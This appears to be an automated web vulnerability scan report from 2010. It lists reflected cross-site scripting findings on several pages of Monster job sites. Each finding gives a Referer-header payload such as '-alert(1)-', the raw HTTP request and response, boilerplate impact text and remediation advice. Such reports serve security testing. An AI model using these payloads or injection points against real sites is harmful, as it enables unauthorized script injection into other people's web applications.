The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6d99f'-alert(1)-'b72d8e5a7e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6d99f'-alert(1)-'b72d8e5a7e0
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:27 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=agskkj5503o4x155ljcst155; path=/; HttpOnly
Set-Cookie: split_scsjsv=89; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:27 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=89; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:27 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: webtrends_Profile=true; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:27 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:27 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 103124
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86afd'-alert(1)-'b9a8cac39fd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Become-Member/Create-Account.aspx HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=86afd'-alert(1)-'b9a8cac39fd
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:08 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=giiali55ysywch55nxh4ib55; path=/; HttpOnly
Set-Cookie: split_scsjsv=1; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:08 GMT; path=/
Set-Cookie: scsjsv=1; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=1; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:08 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:08 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:08 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 53016
Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload faa48'-alert(1)-'84dd028eadb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Career-Assessment/Dashboard.aspx HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=faa48'-alert(1)-'84dd028eadb
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=qsbszxftxn0sppufqxseyjfd; path=/; HttpOnly
Set-Cookie: bmid=3451423; path=/
Set-Cookie: split_scsjsv=71; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:56 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=71; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:56 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:56 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:56 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 146298
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c7cdb'-alert(1)-'42557873a4a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Career-Management/Landing.aspx HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=c7cdb'-alert(1)-'42557873a4a
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:36 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=jbgjvzqauvgx4a55ayshdo45; path=/; HttpOnly
Set-Cookie: split_scsjsv=64; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:35 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=64; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:35 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:35 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:35 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 122445
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f9c1'-alert(1)-'72544dcd3e3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ContactUs.aspx HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=2f9c1'-alert(1)-'72544dcd3e3
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:00 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=popnynm5wphkxkveplhx0czz; path=/; HttpOnly
Set-Cookie: split_scsjsv=50; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:00 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=50; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:00 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:00 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:00 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 54458
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 180b5'-alert(1)-'89bbab2ae9 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /Job-Profiles/GetProfile.aspx HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=180b5'-alert(1)-'89bbab2ae9
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:51:33 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=0luabcrnk41en245hvkwyonq; path=/; HttpOnly
Set-Cookie: split_scsjsv=72; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:51:04 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=72; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:51:04 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:51:33 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:51:33 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 111074
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a54d'-alert(1)-'1fb39391664 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /contactus/ HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6a54d'-alert(1)-'1fb39391664
Response (redirected)
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:53 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=orrhblftx5aqtpqo4elkjgnn; path=/; HttpOnly
Set-Cookie: split_scsjsv=14; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:53 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=14; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:53 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:53 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:53 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 54458
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 50046'-alert(1)-'3535f138ba was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /privacy/default.aspx HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=50046'-alert(1)-'3535f138ba
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:48 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=wsmgkj45ckman2uz350u4c45; path=/; HttpOnly
Set-Cookie: split_scsjsv=8; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:48 GMT; path=/
Set-Cookie: scsjsv=1; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=8; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:48 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:48 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:48 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 44795
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6c3c7'-alert(1)-'14356df9d67 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /resources HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=6c3c7'-alert(1)-'14356df9d67
Response (redirected)
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:49:38 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=j4mgazel4g0xnlvobihcc045; path=/; HttpOnly
Set-Cookie: split_scsjsv=33; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:49:38 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=33; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:49:38 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:49:38 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:49:38 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 90374
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53d4b'-alert(1)-'0633da32c97 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /securitycenter/ HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=53d4b'-alert(1)-'0633da32c97
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:47:55 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=u2hg0r45jyy30izyh1x1vf2v; path=/; HttpOnly
Set-Cookie: split_scsjsv=92; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:47:55 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=92; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:47:55 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:47:55 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:47:55 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 122104
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ba015'-alert(1)-'c903e6242a1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /sitemap HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ba015'-alert(1)-'c903e6242a1
Response (redirected)
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:52 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=bwk5z5rzclawtz55g4pfpezr; path=/; HttpOnly
Set-Cookie: split_scsjsv=6; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:52 GMT; path=/
Set-Cookie: scsjsv=1; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=6; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:52 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:52 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:52 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 95194
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 42524'-alert(1)-'3c402c49615 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /terms/default.aspx HTTP/1.1
Host: my.monster.ca
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=42524'-alert(1)-'3c402c49615
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:48:54 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-XRDS-Location: http://my.monster.com/my20_Yadis.xrdf
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=h4yo4ezhbmcisria5ca2jw55; path=/; HttpOnly
Set-Cookie: split_scsjsv=41; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:54 GMT; path=/
Set-Cookie: scsjsv=0; domain=.monster.ca; path=/
Set-Cookie: split_ssljsv=41; domain=.monster.ca; expires=Sat, 26-Nov-2011 19:48:54 GMT; path=/
Set-Cookie: ssljsv=1; domain=.monster.ca; path=/
Set-Cookie: TC_Top=; expires=Wed, 27-Oct-2010 19:48:54 GMT; path=/
Set-Cookie: TC_Bottom=; expires=Wed, 27-Oct-2010 19:48:54 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 107174
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 976a5'-alert(1)-'b5ef0d27bc7 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1
Host: offres.monster.fr
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=976a5'-alert(1)-'b5ef0d27bc7
Response
HTTP/1.1 200 OK
Date: Fri, 26 Nov 2010 19:49:39 GMT
Server: Microsoft-IIS/6.0
P3P: CP=CAO DSP COR CURa ADMa DEVa TAIi IVAi IVDi CONi HISa TELi OUR DELi SAMi BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=rfw0ev55xkqwpjv3wvf21g45; path=/; HttpOnly
